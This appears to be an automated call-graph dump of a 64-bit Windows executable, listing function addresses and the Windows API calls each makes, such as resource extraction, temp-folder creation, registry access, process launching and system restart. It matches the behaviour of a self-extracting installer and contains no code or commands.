2451->2450 2455 7ff6fd2130a4 2452->2455 2457 7ff6fd2130a9 CloseHandle 2453->2457 2587 7ff6fd213d34 GetVersionExA 2454->2587 2455->2430 2455->2457 2457->2427 2461 7ff6fd217d28 28 API calls 2461->2433 2463 7ff6fd213269 2462->2463 2464 7ff6fd21323e 2462->2464 2700 7ff6fd2161d4 2463->2700 2466 7ff6fd21325c 2464->2466 2680 7ff6fd216294 2464->2680 2859 7ff6fd214064 2466->2859 2474 7ff6fd2186f0 7 API calls 2476 7ff6fd212e07 2474->2476 2475 7ff6fd213283 GetSystemDirectoryA 2477 7ff6fd217e08 CharPrevA 2475->2477 2508 7ff6fd2163dc 2476->2508 2478 7ff6fd2132ae LoadLibraryA 2477->2478 2479 7ff6fd2132c7 GetProcAddress 2478->2479 2480 7ff6fd2132fb FreeLibrary 2478->2480 2479->2480 2483 7ff6fd2132e2 DecryptFileA 2479->2483 2481 7ff6fd213316 2480->2481 2482 7ff6fd2133a5 SetCurrentDirectoryA 2480->2482 2481->2482 2486 7ff6fd213322 GetWindowsDirectoryA 2481->2486 2484 7ff6fd21333f 2482->2484 2485 7ff6fd2133c3 2482->2485 2483->2480 2489 7ff6fd214f2c 24 API calls 2484->2489 2488 7ff6fd213451 2485->2488 2495 7ff6fd21342d 2485->2495 2498 7ff6fd2133fd 2485->2498 2486->2484 2487 7ff6fd21338c 2486->2487 2763 7ff6fd216f14 2487->2763 2492 7ff6fd213479 2488->2492 2494 7ff6fd2123c0 19 API calls 2488->2494 2506 7ff6fd213368 2488->2506 2491 7ff6fd21335d 2489->2491 2878 7ff6fd217958 GetLastError 2491->2878 2497 7ff6fd21349a 2492->2497 2813 7ff6fd2141b4 2492->2813 2494->2492 2791 7ff6fd215f80 2495->2791 2501 7ff6fd2134b5 2497->2501 2497->2506 2502 7ff6fd217d28 28 API calls 2498->2502 2499 7ff6fd213362 2499->2506 2889 7ff6fd214a54 2501->2889 2503 7ff6fd213428 2502->2503 2503->2506 2879 7ff6fd217984 2503->2879 2506->2474 2509 7ff6fd216404 2508->2509 2510 7ff6fd21643c LocalFree LocalFree 2509->2510 2512 7ff6fd216419 SetFileAttributesA DeleteFileA 2509->2512 2517 7ff6fd216463 2509->2517 2510->2509 2511 7ff6fd216501 2513 7ff6fd216577 2511->2513 2515 7ff6fd21651d RegOpenKeyExA 2511->2515 2512->2510 2514 7ff6fd2186f0 7 API calls 2513->2514 2516 7ff6fd212e0e 2514->2516 2515->2513 2518 7ff6fd21654e RegDeleteValueA RegCloseKey 2515->2518 2516->2400 2516->2414 2522 7ff6fd2123c0 2516->2522 2517->2511 2519 7ff6fd2164e4 SetCurrentDirectoryA 2517->2519 2520 7ff6fd217ea0 4 API calls 2517->2520 2518->2513 2521 7ff6fd212034 16 API calls 2519->2521 2520->2519 2521->2511 2523 7ff6fd212478 2522->2523 2524 7ff6fd2123d1 2522->2524 3125 7ff6fd212234 GetWindowsDirectoryA 2523->3125 2525 7ff6fd212471 2524->2525 2528 7ff6fd2123db 2524->2528 3122 7ff6fd212308 RegOpenKeyExA 2525->3122 2527 7ff6fd21246b 2527->2414 2528->2527 2530 7ff6fd2123eb RegOpenKeyExA 2528->2530 2530->2527 2531 7ff6fd212420 RegQueryValueExA RegCloseKey 2530->2531 2531->2527 2533 7ff6fd211c57 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2532->2533 2534 7ff6fd211c34 2532->2534 2533->2534 2535 7ff6fd211cd4 ExitWindowsEx 2533->2535 2536 7ff6fd214f2c 24 API calls 2534->2536 2535->2534 2537 7ff6fd211c50 2535->2537 2536->2537 2538 7ff6fd2186f0 7 API calls 2537->2538 2539 7ff6fd211d02 2538->2539 2539->2400 2541 7ff6fd212f6b 2540->2541 2542 7ff6fd215243 2540->2542 2541->2421 2541->2422 2542->2541 2543 7ff6fd21524c FindResourceA LoadResource LockResource 2542->2543 2543->2541 2544 7ff6fd21528b memcpy_s FreeResource 2543->2544 2544->2541 2546 7ff6fd2177de 2545->2546 2569 7ff6fd21736a 2545->2569 2547 7ff6fd2186f0 7 API calls 2546->2547 2549 7ff6fd2130d9 2547->2549 2548 7ff6fd217442 2548->2546 2551 7ff6fd21745f GetModuleFileNameA 2548->2551 2549->2422 2549->2439 2550 7ff6fd217395 CharNextA 2550->2569 2552 7ff6fd217487 2551->2552 2553 7ff6fd217494 2551->2553 2621 7ff6fd217fb8 2552->2621 2553->2546 2555 7ff6fd21794b 2633 7ff6fd2188c8 RtlCaptureContext RtlLookupFunctionEntry 2555->2633 2558 7ff6fd2174b0 CharUpperA 2559 7ff6fd2178e7 2558->2559 2558->2569 2630 7ff6fd211bc0 2559->2630 2562 7ff6fd2178f8 CloseHandle 2563 7ff6fd217904 ExitProcess 2562->2563 2564 7ff6fd217615 CharUpperA 2564->2569 2565 7ff6fd2175be CompareStringA 2565->2569 2566 7ff6fd217673 CharUpperA 2566->2569 2567 7ff6fd21770a CharUpperA 2567->2569 2568 7ff6fd217548 CharUpperA 2568->2569 2569->2546 2569->2548 2569->2550 2569->2555 2569->2558 2569->2564 2569->2565 2569->2566 2569->2567 2569->2568 2571 7ff6fd217f48 IsDBCSLeadByte CharNextA 2569->2571 2626 7ff6fd217e08 2569->2626 2571->2569 2573 7ff6fd212213 2572->2573 2576 7ff6fd21203d 2572->2576 2573->2427 2574 7ff6fd212204 2575 7ff6fd2186f0 7 API calls 2574->2575 2575->2573 2576->2574 2577 7ff6fd2120cd FindFirstFileA 2576->2577 2577->2574 2585 7ff6fd2120ef 2577->2585 2578 7ff6fd212129 lstrcmpA 2580 7ff6fd212149 lstrcmpA 2578->2580 2581 7ff6fd2121ca FindNextFileA 2578->2581 2579 7ff6fd212194 2583 7ff6fd2121a5 SetFileAttributesA DeleteFileA 2579->2583 2580->2581 2580->2585 2582 7ff6fd2121e6 FindClose RemoveDirectoryA 2581->2582 2581->2585 2582->2574 2583->2581 2584 7ff6fd217e08 CharPrevA 2584->2585 2585->2578 2585->2579 2585->2581 2585->2584 2586 7ff6fd212034 8 API calls 2585->2586 2586->2585 2588 7ff6fd213d8a 2587->2588 2589 7ff6fd213d91 2587->2589 2590 7ff6fd214f2c 24 API calls 2588->2590 2589->2588 2593 7ff6fd213ef5 2589->2593 2601 7ff6fd213ffb 2589->2601 2639 7ff6fd212898 2589->2639 2590->2601 2591 7ff6fd2186f0 7 API calls 2592 7ff6fd21316a 2591->2592 2592->2427 2602 7ff6fd211258 2592->2602 2593->2588 2595 7ff6fd213fae MessageBeep 2593->2595 2593->2601 2596 7ff6fd218154 13 API calls 2595->2596 2597 7ff6fd213fc1 2596->2597 2598 7ff6fd213fca MessageBoxA 2597->2598 2599 7ff6fd218084 2 API calls 2597->2599 2598->2601 2599->2598 2601->2591 2603 7ff6fd2112a8 2602->2603 2604 7ff6fd211421 2602->2604 2671 7ff6fd211130 LoadLibraryA 2603->2671 2606 7ff6fd2186f0 7 API calls 2604->2606 2608 7ff6fd211446 2606->2608 2608->2427 2608->2461 2609 7ff6fd2112b9 GetCurrentProcess OpenProcessToken 2609->2604 2610 7ff6fd2112e3 GetTokenInformation 2609->2610 2611 7ff6fd21140c CloseHandle 2610->2611 2612 7ff6fd21130c GetLastError 2610->2612 2611->2604 2612->2611 2613 7ff6fd211321 LocalAlloc 2612->2613 2613->2611 2614 7ff6fd21133e GetTokenInformation 2613->2614 2615 7ff6fd211368 AllocateAndInitializeSid 2614->2615 2616 7ff6fd2113fd LocalFree 2614->2616 2615->2616 2619 7ff6fd2113b1 2615->2619 2616->2611 2617 7ff6fd2113ed FreeSid 2617->2616 2618 7ff6fd2113be EqualSid 2618->2619 2620 7ff6fd2113e2 2618->2620 2619->2617 2619->2618 2619->2620 2620->2617 2622 7ff6fd218029 2621->2622 2624 7ff6fd217fd8 2621->2624 2622->2553 2623 7ff6fd217fe0 IsDBCSLeadByte 2623->2624 2624->2623 2625 7ff6fd218006 CharNextA 2624->2625 2625->2622 2625->2624 2627 7ff6fd217e28 2626->2627 2627->2627 2628 7ff6fd217e4c CharPrevA 2627->2628 2629 7ff6fd217e3a 2627->2629 2628->2629 2629->2569 2631 7ff6fd214f2c 24 API calls 2630->2631 2632 7ff6fd211be7 2631->2632 2632->2562 2632->2563 2634 7ff6fd218947 2633->2634 2635 7ff6fd218905 RtlVirtualUnwind 2633->2635 2638 7ff6fd218714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2634->2638 2635->2634 2640 7ff6fd212a9a 2639->2640 2650 7ff6fd2128d5 2639->2650 2641 7ff6fd212aaa 2640->2641 2642 7ff6fd212abf GlobalFree 2640->2642 2641->2593 2642->2641 2644 7ff6fd212908 GetFileVersionInfoSizeA 2645 7ff6fd212926 GlobalAlloc 2644->2645 2644->2650 2645->2641 2646 7ff6fd212946 GlobalLock 2645->2646 2646->2640 2647 7ff6fd212961 GetFileVersionInfoA 2646->2647 2648 7ff6fd212985 VerQueryValueA 2647->2648 2647->2650 2649 7ff6fd212a59 GlobalUnlock 2648->2649 2648->2650 2649->2650 2650->2640 2650->2644 2650->2649 2651 7ff6fd212a3e GlobalUnlock 2650->2651 2652 7ff6fd212644 2650->2652 2651->2642 2653 7ff6fd212849 GetSystemDirectoryA 2652->2653 2654 7ff6fd212683 CharUpperA CharNextA CharNextA 2652->2654 2658 7ff6fd212843 2653->2658 2655 7ff6fd21282f GetSystemDirectoryA 2654->2655 2656 7ff6fd2126c4 2654->2656 2655->2658 2657 7ff6fd212819 GetWindowsDirectoryA 2656->2657 2661 7ff6fd2126ce 2656->2661 2657->2658 2659 7ff6fd217e08 CharPrevA 2658->2659 2660 7ff6fd21286a 2658->2660 2659->2660 2662 7ff6fd2186f0 7 API calls 2660->2662 2664 7ff6fd217e08 CharPrevA 2661->2664 2663 7ff6fd212879 2662->2663 2663->2650 2665 7ff6fd21272d RegOpenKeyExA 2664->2665 2665->2658 2666 7ff6fd212760 RegQueryValueExA 2665->2666 2667 7ff6fd212806 RegCloseKey 2666->2667 2668 7ff6fd212793 2666->2668 2667->2658 2669 7ff6fd21279c ExpandEnvironmentStringsA 2668->2669 2670 7ff6fd2127ba 2668->2670 2669->2670 2670->2667 2672 7ff6fd211229 2671->2672 2673 7ff6fd211185 GetProcAddress 2671->2673 2674 7ff6fd2186f0 7 API calls 2672->2674 2675 7ff6fd21121a FreeLibrary 2673->2675 2676 7ff6fd2111a3 AllocateAndInitializeSid 2673->2676 2677 7ff6fd211238 2674->2677 2675->2672 2676->2675 2678 7ff6fd2111ec FreeSid 2676->2678 2677->2604 2677->2609 2678->2675 2681 7ff6fd2151f8 7 API calls 2680->2681 2682 7ff6fd2162af LocalAlloc 2681->2682 2683 7ff6fd2162fb 2682->2683 2684 7ff6fd2162cd 2682->2684 2686 7ff6fd2151f8 7 API calls 2683->2686 2685 7ff6fd214f2c 24 API calls 2684->2685 2688 7ff6fd2162eb 2685->2688 2687 7ff6fd21630d 2686->2687 2689 7ff6fd21634a lstrcmpA 2687->2689 2690 7ff6fd216311 2687->2690 2902 7ff6fd217958 GetLastError 2688->2902 2693 7ff6fd21637a 2689->2693 2694 7ff6fd216364 LocalFree 2689->2694 2692 7ff6fd214f2c 24 API calls 2690->2692 2696 7ff6fd21632f LocalFree 2692->2696 2698 7ff6fd214f2c 24 API calls 2693->2698 2697 7ff6fd21324b 2694->2697 2695 7ff6fd2162f0 2695->2697 2696->2697 2697->2463 2697->2466 2697->2506 2699 7ff6fd21639c LocalFree 2698->2699 2699->2695 2701 7ff6fd2151f8 7 API calls 2700->2701 2702 7ff6fd2161f1 2701->2702 2703 7ff6fd2161f6 2702->2703 2704 7ff6fd21623a 2702->2704 2705 7ff6fd214f2c 24 API calls 2703->2705 2706 7ff6fd2151f8 7 API calls 2704->2706 2707 7ff6fd216215 2705->2707 2708 7ff6fd216253 2706->2708 2709 7ff6fd21326e 2707->2709 2710 7ff6fd217984 13 API calls 2708->2710 2709->2506 2714 7ff6fd2168f0 2709->2714 2711 7ff6fd21625f 2710->2711 2711->2709 2712 7ff6fd216263 2711->2712 2713 7ff6fd214f2c 24 API calls 2712->2713 2713->2707 2715 7ff6fd2151f8 7 API calls 2714->2715 2716 7ff6fd216932 LocalAlloc 2715->2716 2717 7ff6fd216982 2716->2717 2718 7ff6fd216952 2716->2718 2719 7ff6fd2151f8 7 API calls 2717->2719 2720 7ff6fd214f2c 24 API calls 2718->2720 2721 7ff6fd216994 2719->2721 2722 7ff6fd216970 2720->2722 2723 7ff6fd216998 2721->2723 2724 7ff6fd2169d1 lstrcmpA LocalFree 2721->2724 2927 7ff6fd217958 GetLastError 2722->2927 2726 7ff6fd214f2c 24 API calls 2723->2726 2727 7ff6fd216a18 2724->2727 2728 7ff6fd216a63 2724->2728 2732 7ff6fd2169b6 LocalFree 2726->2732 2737 7ff6fd216710 53 API calls 2727->2737 2731 7ff6fd216d40 2728->2731 2734 7ff6fd216a7b GetTempPathA 2728->2734 2729 7ff6fd216975 2730 7ff6fd21697b 2729->2730 2735 7ff6fd2186f0 7 API calls 2730->2735 2733 7ff6fd217d28 28 API calls 2731->2733 2732->2730 2733->2730 2736 7ff6fd216a9e 2734->2736 2743 7ff6fd216ad1 2734->2743 2738 7ff6fd21327b 2735->2738 2903 7ff6fd216710 2736->2903 2740 7ff6fd216a38 2737->2740 2738->2475 2738->2506 2740->2730 2742 7ff6fd216a40 2740->2742 2744 7ff6fd214f2c 24 API calls 2742->2744 2743->2730 2745 7ff6fd216d07 GetWindowsDirectoryA 2743->2745 2746 7ff6fd216b25 GetDriveTypeA 2743->2746 2744->2729 2750 7ff6fd216f14 38 API calls 2745->2750 2748 7ff6fd216b42 GetFileAttributesA 2746->2748 2755 7ff6fd216b3d 2746->2755 2748->2755 2750->2743 2751 7ff6fd216710 53 API calls 2751->2743 2752 7ff6fd216b81 GetDiskFreeSpaceA 2754 7ff6fd216baf MulDiv 2752->2754 2752->2755 2753 7ff6fd212490 25 API calls 2753->2755 2754->2755 2755->2730 2755->2745 2755->2746 2755->2748 2755->2752 2755->2753 2756 7ff6fd216c2e GetWindowsDirectoryA 2755->2756 2757 7ff6fd216f14 38 API calls 2755->2757 2758 7ff6fd217e08 CharPrevA 2755->2758 2761 7ff6fd216c99 SetFileAttributesA 2755->2761 2762 7ff6fd216710 53 API calls 2755->2762 2756->2755 2757->2755 2759 7ff6fd216c56 GetFileAttributesA 2758->2759 2759->2755 2760 7ff6fd216c6c CreateDirectoryA 2759->2760 2760->2755 2761->2755 2762->2755 2764 7ff6fd216f63 GetCurrentDirectoryA SetCurrentDirectoryA 2763->2764 2788 7ff6fd216f5b 2763->2788 2765 7ff6fd216fbb GetDiskFreeSpaceA 2764->2765 2766 7ff6fd216f8e 2764->2766 2767 7ff6fd2171da memset 2765->2767 2768 7ff6fd216ffc MulDiv 2765->2768 2770 7ff6fd214f2c 24 API calls 2766->2770 2978 7ff6fd217958 GetLastError 2767->2978 2768->2767 2772 7ff6fd21702a GetVolumeInformationA 2768->2772 2769 7ff6fd2186f0 7 API calls 2773 7ff6fd2133a1 2769->2773 2774 7ff6fd216fab 2770->2774 2777 7ff6fd2170c1 SetCurrentDirectoryA 2772->2777 2778 7ff6fd217062 memset 2772->2778 2773->2482 2773->2506 2959 7ff6fd217958 GetLastError 2774->2959 2776 7ff6fd2171f2 GetLastError FormatMessageA 2779 7ff6fd217234 2776->2779 2784 7ff6fd2170e9 2777->2784 2960 7ff6fd217958 GetLastError 2778->2960 2781 7ff6fd214f2c 24 API calls 2779->2781 2783 7ff6fd21724f SetCurrentDirectoryA 2781->2783 2782 7ff6fd21707a GetLastError FormatMessageA 2782->2779 2783->2788 2785 7ff6fd21712c 2784->2785 2789 7ff6fd217150 2784->2789 2786 7ff6fd214f2c 24 API calls 2785->2786 2787 7ff6fd216fb0 2786->2787 2787->2788 2788->2769 2789->2788 2961 7ff6fd212520 2789->2961 2792 7ff6fd215f9b FindResourceA LoadResource LockResource 2791->2792 2793 7ff6fd2151f8 7 API calls 2791->2793 2794 7ff6fd215fec 2792->2794 2795 7ff6fd2161bf 2792->2795 2793->2792 2796 7ff6fd216046 2794->2796 2797 7ff6fd215ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2794->2797 2795->2503 2979 7ff6fd215e44 #20 2796->2979 2797->2796 2800 7ff6fd216059 #20 2801 7ff6fd21604f 2800->2801 2802 7ff6fd2160c1 #22 2800->2802 2805 7ff6fd214f2c 24 API calls 2801->2805 2803 7ff6fd216145 2802->2803 2804 7ff6fd216105 #23 2802->2804 2806 7ff6fd216151 FreeResource 2803->2806 2807 7ff6fd216165 2803->2807 2804->2801 2804->2803 2808 7ff6fd216143 2805->2808 2806->2807 2809 7ff6fd21618f 2807->2809 2810 7ff6fd216171 2807->2810 2808->2803 2809->2795 2812 7ff6fd2161a1 SendMessageA 2809->2812 2811 7ff6fd214f2c 24 API calls 2810->2811 2811->2809 2812->2795 2814 7ff6fd214208 2813->2814 2831 7ff6fd21421f 2813->2831 2815 7ff6fd2151f8 7 API calls 2814->2815 2815->2831 2816 7ff6fd214235 memset 2816->2831 2817 7ff6fd21434a 2818 7ff6fd214f2c 24 API calls 2817->2818 2819 7ff6fd214369 2818->2819 2820 7ff6fd2145e9 2819->2820 2823 7ff6fd2186f0 7 API calls 2820->2823 2821 7ff6fd2151f8 7 API calls 2821->2831 2824 7ff6fd2145fa 2823->2824 2824->2497 2825 7ff6fd2143eb CompareStringA 2826 7ff6fd2146d3 2825->2826 2825->2831 2826->2820 2829 7ff6fd2146ed RegOpenKeyExA 2826->2829 2827 7ff6fd214694 2832 7ff6fd214f2c 24 API calls 2827->2832 2829->2820 2830 7ff6fd214722 RegQueryValueExA 2829->2830 2833 7ff6fd214817 RegCloseKey 2830->2833 2834 7ff6fd214767 memset GetSystemDirectoryA 2830->2834 2831->2816 2831->2817 2831->2820 2831->2821 2831->2825 2831->2826 2831->2827 2835 7ff6fd2145a8 LocalFree 2831->2835 2836 7ff6fd2145da LocalFree 2831->2836 2841 7ff6fd2142ed CompareStringA 2831->2841 2856 7ff6fd21448a 2831->2856 2991 7ff6fd2115f4 2831->2991 3030 7ff6fd211d10 memset memset RegCreateKeyExA 2831->3030 3057 7ff6fd214838 2831->3057 2837 7ff6fd2146b3 LocalFree 2832->2837 2833->2820 2839 7ff6fd214798 2834->2839 2840 7ff6fd2147ae 2834->2840 2835->2826 2835->2831 2836->2820 2837->2820 2843 7ff6fd217e08 CharPrevA 2839->2843 2844 7ff6fd2110bc _vsnprintf 2840->2844 2841->2831 2843->2840 2845 7ff6fd2147d7 RegSetValueExA 2844->2845 2845->2833 2846 7ff6fd21449b GetProcAddress 2848 7ff6fd21461c 2846->2848 2846->2856 2847 7ff6fd21466f 2849 7ff6fd214f2c 24 API calls 2847->2849 2850 7ff6fd214f2c 24 API calls 2848->2850 2852 7ff6fd214692 2849->2852 2853 7ff6fd21463f FreeLibrary 2850->2853 2854 7ff6fd21464e LocalFree 2852->2854 2853->2854 3083 7ff6fd217958 GetLastError 2854->3083 2856->2846 2856->2847 2857 7ff6fd2145ce FreeLibrary 2856->2857 2858 7ff6fd214580 FreeLibrary 2856->2858 3073 7ff6fd217c50 2856->3073 2857->2836 2858->2835 2860 7ff6fd2151f8 7 API calls 2859->2860 2861 7ff6fd21407b LocalAlloc 2860->2861 2862 7ff6fd2140cd 2861->2862 2863 7ff6fd21409d 2861->2863 2865 7ff6fd2151f8 7 API calls 2862->2865 2864 7ff6fd214f2c 24 API calls 2863->2864 2866 7ff6fd2140bb 2864->2866 2867 7ff6fd2140df 2865->2867 3121 7ff6fd217958 GetLastError 2866->3121 2869 7ff6fd214120 lstrcmpA 2867->2869 2870 7ff6fd2140e3 2867->2870 2873 7ff6fd214188 LocalFree 2869->2873 2874 7ff6fd21413e 2869->2874 2872 7ff6fd214f2c 24 API calls 2870->2872 2871 7ff6fd213261 2871->2463 2871->2506 2875 7ff6fd214101 LocalFree 2872->2875 2873->2871 2876 7ff6fd217d28 28 API calls 2874->2876 2875->2871 2877 7ff6fd21415e LocalFree 2876->2877 2877->2871 2878->2499 2886 7ff6fd2179e2 2879->2886 2880 7ff6fd2110bc _vsnprintf 2881 7ff6fd217a41 FindResourceA 2880->2881 2882 7ff6fd2179b6 LoadResource LockResource 2881->2882 2883 7ff6fd217a63 2881->2883 2882->2883 2882->2886 2884 7ff6fd2186f0 7 API calls 2883->2884 2885 7ff6fd217a90 2884->2885 2885->2488 2886->2880 2887 7ff6fd217a1a FreeResource 2886->2887 2888 7ff6fd217a65 FreeResource 2886->2888 2887->2886 2888->2883 2890 7ff6fd2151f8 7 API calls 2889->2890 2891 7ff6fd214a6f LocalAlloc 2890->2891 2892 7ff6fd214ab1 2891->2892 2893 7ff6fd214a91 2891->2893 2894 7ff6fd2151f8 7 API calls 2892->2894 2895 7ff6fd214f2c 24 API calls 2893->2895 2896 7ff6fd214ac3 2894->2896 2897 7ff6fd214aaf 2895->2897 2898 7ff6fd214ac7 2896->2898 2899 7ff6fd214add lstrcmpA 2896->2899 2897->2506 2901 7ff6fd214f2c 24 API calls 2898->2901 2899->2898 2900 7ff6fd214b16 LocalFree 2899->2900 2900->2897 2901->2900 2902->2695 2904 7ff6fd216742 2903->2904 2906 7ff6fd216809 2903->2906 2934 7ff6fd2165a8 2904->2934 2945 7ff6fd216d9c 2906->2945 2907 7ff6fd216886 2909 7ff6fd2186f0 7 API calls 2907->2909 2914 7ff6fd2168d2 2909->2914 2912 7ff6fd2167f8 2920 7ff6fd217e08 CharPrevA 2912->2920 2913 7ff6fd2167a3 GetSystemInfo 2921 7ff6fd2167bd 2913->2921 2914->2730 2928 7ff6fd212490 GetWindowsDirectoryA 2914->2928 2915 7ff6fd216856 CreateDirectoryA 2917 7ff6fd21686b 2915->2917 2918 7ff6fd216894 2915->2918 2916 7ff6fd216875 2919 7ff6fd216f14 38 API calls 2916->2919 2917->2916 2957 7ff6fd217958 GetLastError 2918->2957 2922 7ff6fd216882 2919->2922 2920->2906 2921->2912 2924 7ff6fd217e08 CharPrevA 2921->2924 2922->2907 2926 7ff6fd2168aa RemoveDirectoryA 2922->2926 2924->2912 2925 7ff6fd216899 2925->2907 2926->2907 2927->2729 2929 7ff6fd2124ec 2928->2929 2930 7ff6fd2124ce 2928->2930 2932 7ff6fd2186f0 7 API calls 2929->2932 2931 7ff6fd214f2c 24 API calls 2930->2931 2931->2929 2933 7ff6fd212507 2932->2933 2933->2743 2933->2751 2936 7ff6fd2165df 2934->2936 2935 7ff6fd2110bc _vsnprintf 2935->2936 2936->2935 2937 7ff6fd217e08 CharPrevA 2936->2937 2941 7ff6fd21666f GetTempFileNameA 2936->2941 2938 7ff6fd216640 RemoveDirectoryA GetFileAttributesA 2937->2938 2938->2936 2939 7ff6fd2166df CreateDirectoryA 2938->2939 2940 7ff6fd2166b4 2939->2940 2939->2941 2943 7ff6fd2186f0 7 API calls 2940->2943 2941->2940 2942 7ff6fd21668f DeleteFileA CreateDirectoryA 2941->2942 2942->2940 2944 7ff6fd2166c6 2943->2944 2944->2907 2944->2912 2944->2913 2946 7ff6fd216db7 2945->2946 2946->2946 2947 7ff6fd216dc0 LocalAlloc 2946->2947 2948 7ff6fd216de0 2947->2948 2951 7ff6fd216e21 2947->2951 2949 7ff6fd214f2c 24 API calls 2948->2949 2950 7ff6fd216dfe 2949->2950 2955 7ff6fd216852 2950->2955 2958 7ff6fd217958 GetLastError 2950->2958 2952 7ff6fd217e08 CharPrevA 2951->2952 2954 7ff6fd216e7f CreateFileA LocalFree 2952->2954 2954->2950 2956 7ff6fd216ecb CloseHandle GetFileAttributesA 2954->2956 2955->2915 2955->2916 2956->2950 2957->2925 2958->2955 2959->2787 2960->2782 2962 7ff6fd21258a 2961->2962 2963 7ff6fd21254d 2961->2963 2964 7ff6fd21258f 2962->2964 2965 7ff6fd2125d3 2962->2965 2966 7ff6fd2110bc _vsnprintf 2963->2966 2968 7ff6fd2110bc _vsnprintf 2964->2968 2969 7ff6fd212585 2965->2969 2973 7ff6fd2110bc _vsnprintf 2965->2973 2967 7ff6fd212565 2966->2967 2970 7ff6fd214f2c 24 API calls 2967->2970 2972 7ff6fd2125a7 2968->2972 2971 7ff6fd2186f0 7 API calls 2969->2971 2970->2969 2974 7ff6fd212631 2971->2974 2975 7ff6fd214f2c 24 API calls 2972->2975 2976 7ff6fd2125ef 2973->2976 2974->2788 2975->2969 2977 7ff6fd214f2c 24 API calls 2976->2977 2977->2969 2978->2776 2980 7ff6fd215ed1 2979->2980 2990 7ff6fd215f46 2979->2990 2981 7ff6fd2155c0 29 API calls 2980->2981 2983 7ff6fd215ee8 2981->2983 2982 7ff6fd2186f0 7 API calls 2984 7ff6fd215f5c 2982->2984 2985 7ff6fd215ef1 #21 2983->2985 2983->2990 2984->2800 2984->2801 2986 7ff6fd215f0c 2985->2986 2985->2990 2987 7ff6fd2159b0 CloseHandle 2986->2987 2986->2990 2988 7ff6fd215f2e 2987->2988 2989 7ff6fd215f33 #23 2988->2989 2988->2990 2989->2990 2990->2982 2992 7ff6fd211649 2991->2992 3084 7ff6fd211558 2992->3084 2995 7ff6fd217e08 CharPrevA 2997 7ff6fd2116dc 2995->2997 2996 7ff6fd217fb8 2 API calls 2998 7ff6fd21177f 2996->2998 2997->2996 2999 7ff6fd211788 CompareStringA 2998->2999 3000 7ff6fd2119d3 2998->3000 2999->3000 3001 7ff6fd2117bb GetFileAttributesA 2999->3001 3002 7ff6fd217fb8 2 API calls 3000->3002 3003 7ff6fd2119ab 3001->3003 3004 7ff6fd2117d5 3001->3004 3005 7ff6fd2119e0 3002->3005 3010 7ff6fd214f2c 24 API calls 3003->3010 3004->3003 3009 7ff6fd211558 2 API calls 3004->3009 3006 7ff6fd2119e9 CompareStringA 3005->3006 3007 7ff6fd211a83 LocalAlloc 3005->3007 3006->3007 3008 7ff6fd211a18 LocalAlloc 3006->3008 3007->3003 3011 7ff6fd211aa3 GetFileAttributesA 3007->3011 3008->3003 3024 7ff6fd211a6a 3008->3024 3012 7ff6fd2117f9 3009->3012 3028 7ff6fd2118c5 3010->3028 3021 7ff6fd211ab9 3011->3021 3013 7ff6fd211823 LocalAlloc 3012->3013 3016 7ff6fd211558 2 API calls 3012->3016 3013->3003 3017 7ff6fd211847 GetPrivateProfileIntA GetPrivateProfileStringA 3013->3017 3014 7ff6fd211b82 3015 7ff6fd2186f0 7 API calls 3014->3015 3018 7ff6fd211b9e 3015->3018 3016->3013 3020 7ff6fd211940 3017->3020 3017->3028 3018->2831 3022 7ff6fd211951 GetShortPathNameA 3020->3022 3023 7ff6fd211973 3020->3023 3029 7ff6fd211b0c 3021->3029 3022->3023 3027 7ff6fd2110bc _vsnprintf 3023->3027 3026 7ff6fd2110bc _vsnprintf 3024->3026 3026->3028 3027->3028 3028->3014 3092 7ff6fd212ae8 3029->3092 3031 7ff6fd211db6 3030->3031 3032 7ff6fd211fff 3030->3032 3035 7ff6fd2110bc _vsnprintf 3031->3035 3038 7ff6fd211e0d 3031->3038 3033 7ff6fd2186f0 7 API calls 3032->3033 3034 7ff6fd21200e 3033->3034 3034->2831 3036 7ff6fd211dd6 RegQueryValueExA 3035->3036 3036->3031 3037 7ff6fd211e2c GetSystemDirectoryA 3036->3037 3039 7ff6fd217e08 CharPrevA 3037->3039 3038->3037 3040 7ff6fd211e0f RegCloseKey 3038->3040 3041 7ff6fd211e50 LoadLibraryA 3039->3041 3040->3032 3042 7ff6fd211f3b GetModuleFileNameA 3041->3042 3043 7ff6fd211e6c GetProcAddress FreeLibrary 3041->3043 3045 7ff6fd211f5e RegCloseKey 3042->3045 3048 7ff6fd211ece 3042->3048 3043->3042 3044 7ff6fd211ea4 GetSystemDirectoryA 3043->3044 3046 7ff6fd211ebb 3044->3046 3044->3048 3045->3032 3047 7ff6fd217e08 CharPrevA 3046->3047 3047->3048 3048->3048 3049 7ff6fd211ef7 LocalAlloc 3048->3049 3050 7ff6fd211f1b 3049->3050 3051 7ff6fd211f74 3049->3051 3052 7ff6fd214f2c 24 API calls 3050->3052 3053 7ff6fd2110bc _vsnprintf 3051->3053 3054 7ff6fd211f39 3052->3054 3055 7ff6fd211faa 3053->3055 3054->3045 3055->3055 3056 7ff6fd211fb3 RegSetValueExA RegCloseKey LocalFree 3055->3056 3056->3032 3058 7ff6fd214874 CreateProcessA 3057->3058 3068 7ff6fd21486d 3057->3068 3059 7ff6fd2148ca WaitForSingleObject GetExitCodeProcess 3058->3059 3060 7ff6fd2149bb 3058->3060 3064 7ff6fd214901 3059->3064 3120 7ff6fd217958 GetLastError 3060->3120 3062 7ff6fd2186f0 7 API calls 3065 7ff6fd214a37 3062->3065 3063 7ff6fd2149c0 GetLastError FormatMessageA 3066 7ff6fd214f2c 24 API calls 3063->3066 3070 7ff6fd2123c0 19 API calls 3064->3070 3072 7ff6fd214932 CloseHandle CloseHandle 3064->3072 3065->2831 3066->3068 3068->3062 3069 7ff6fd2149b2 3069->3068 3071 7ff6fd214955 3070->3071 3071->3072 3072->3068 3072->3069 3074 7ff6fd217c85 3073->3074 3075 7ff6fd217e08 CharPrevA 3074->3075 3076 7ff6fd217cc3 GetFileAttributesA 3075->3076 3077 7ff6fd217cf6 LoadLibraryA 3076->3077 3078 7ff6fd217cd9 3076->3078 3080 7ff6fd217d09 3077->3080 3078->3077 3079 7ff6fd217cdd LoadLibraryExA 3078->3079 3079->3080 3081 7ff6fd2186f0 7 API calls 3080->3081 3082 7ff6fd217d19 3081->3082 3082->2856 3083->2819 3085 7ff6fd211579 3084->3085 3087 7ff6fd211591 3085->3087 3088 7ff6fd2115c1 3085->3088 3106 7ff6fd217f48 3085->3106 3089 7ff6fd217f48 2 API calls 3087->3089 